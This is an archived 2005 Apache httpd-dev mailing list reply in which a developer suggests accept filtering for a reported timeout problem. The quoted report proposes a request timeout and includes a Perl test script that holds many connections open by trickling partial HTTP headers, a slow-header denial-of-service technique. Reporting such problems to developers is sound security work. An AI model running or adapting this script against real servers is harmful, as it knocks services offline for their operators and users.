httpd-dev mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From Rasmus Lerdorf <ras...@lerdorf.com>
Subject Re: Timeout for requests
Date Tue, 03 May 2005 16:33:06 GMT
Turn on accept filtering and this problem goes away.  Or at least it 
moves to be a kernel-level issue instead of an Apache one.

-Rasmus

Ivan Barrera A. wrote:
> Hi...
> 
>  I'm still fighting (probably for a lost cause.. but my boss ask me to
> do this).
>  In the socket activity there are some troubles dealing with timeouts.
> It is pretty easy to Anyone DoS any apache webserver.
>  I want to propose implementing a request timeout time, or at least a
> check for incoming data.
> 
>  If you open many sockets to an apache server, you can keep it alive,
> and make apache keep it open for a looong time, eating resources. If you
> limit the numbers of conecctions per ip, you still can DoS apache using
> 2 or more other ips.
> 
>  All this was tedtes with Timeout set to 20, KeepAlive set to 5, and all
> relevant options to their lowest value.
> 
> 
>  (one of the common scrips used to kill apache, is apache-squ1rt, i use
> this other to test)
>  Use this perl script to test :
> 
> #!/usr/bin/perl
> 
> my $Child = 150;
> my $Sleep = 10;
> 
> use IO::Socket;
> use strict;
> 
> my($c);
> my(@SOCKET);
> my($t);
> 
> local $| = 1;
> 
> $c=0;
> for(0..$Child) {
>   @SOCKET[$c] = new IO::Socket::INET( Proto   => "tcp",
>                                             PeerAddr=> "127.0.0.1:80");
>   $c++;
> }
> 
> for(0..$Child) {
>   if ( defined @SOCKET[$c]) {
>     $t = @SOCKET[$c];
>     print $t "GET / HTTP/1.1";
>   }
> }
> 
> 
> while(1){
>   $c=0;
>   # For each children
>   for(0..$Child) {
>     if ( defined @SOCKET[$c]) {
>       $t = @SOCKET[$c];
>       print $t "host: test.test";
>     }
>     $c++;
>   }
>   sleep ($Sleep);
> }
> 
> $c=0;
> for(0..$Child) {
>   close(@SOCKET[$c++]);
> }


Mime
View raw message